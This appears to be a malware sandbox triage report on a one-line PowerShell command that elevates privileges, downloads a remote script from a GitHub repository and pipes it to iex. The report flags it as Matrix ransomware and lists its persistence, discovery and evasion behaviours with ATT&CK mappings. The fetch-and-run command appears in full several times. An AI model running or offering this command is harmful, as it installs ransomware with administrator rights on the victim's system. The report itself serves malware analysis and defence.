matrix | hxxp://start-process PowerShell -verb runas irm hxxps://raw[.]githubusercontent[.]com/Lachine1/xmrig-scripts/main/windows[.]ps1 | iex | Triage

Submit
Reports

Overview

overview

Static

static

1

URLScan

urlscan

http://start-process...

windows10-ltsc 2021-x64

Sharing

General

Target

http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Sample

241115-r38f8avlhw

Score

10^/10

matrix defense_evasion discovery execution persistence phishing privilege_escalation ransomware

Static task

static1

URLScan task

urlscan1

Behavioral task

behavioral1

Sample

http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Resource

win10ltsc2021-20241023-en

matrix defense_evasion discovery execution persistence phishing privilege_escalation ransomware

windows10-ltsc 2021-x64

50 signatures

1800 seconds

Malware Config

Targets

- Target
  
  http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Score

10^/10

matrix defense_evasion discovery execution persistence phishing privilege_escalation ransomware
- Matrix Ransomware
  Targeted ransomware with information collection and encryption functionality.
  ransomware matrix
- Matrix family
  matrix
- Downloads MZ/PE file
- Drops file in Drivers directory
- A potential corporate email address has been identified in the URL: [email protected]
  phishing
- Event Triggered Execution: Component Object Model Hijacking
  Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
  persistence privilege_escalation
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
  persistence
- Adds Run key to start application
  persistence
- Command and Scripting Interpreter: PowerShell
  Using powershell.exe command.
  execution
- Enumerates connected drives
  Attempts to read the root path of hard drives other than the default C: drive.
- Legitimate hosting services abused for malware hosting/C2
- Drops file in System32 directory
- Sets desktop wallpaper using registry
  ransomware
- Suspicious use of NtSetInformationThreadHideFromDebugger
behavioral1

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

Persistence

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Event Triggered Execution

Change Default File Association

Component Object Model Hijacking

Privilege Escalation

Access Token Manipulation

Create Process with Token

Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder

Event Triggered Execution

Change Default File Association

Component Object Model Hijacking

Defense Evasion

Access Token Manipulation

Create Process with Token

Modify Registry

Credential Access

Discovery

Browser Information Discovery

Peripheral Device Discovery

Query Registry

Remote System Discovery

System Information Discovery

System Location Discovery

System Language Discovery

System Network Configuration Discovery

Internet Connection Discovery

Lateral Movement

Collection

Command and Control

Web Service

Exfiltration

Impact

Defacement

Tasks

static1

urlscan1

behavioral1

matrixdefense_evasiondiscoveryexecutionpersistencephishingprivilege_escalationransomware

© 2018-2024

Terms | Privacy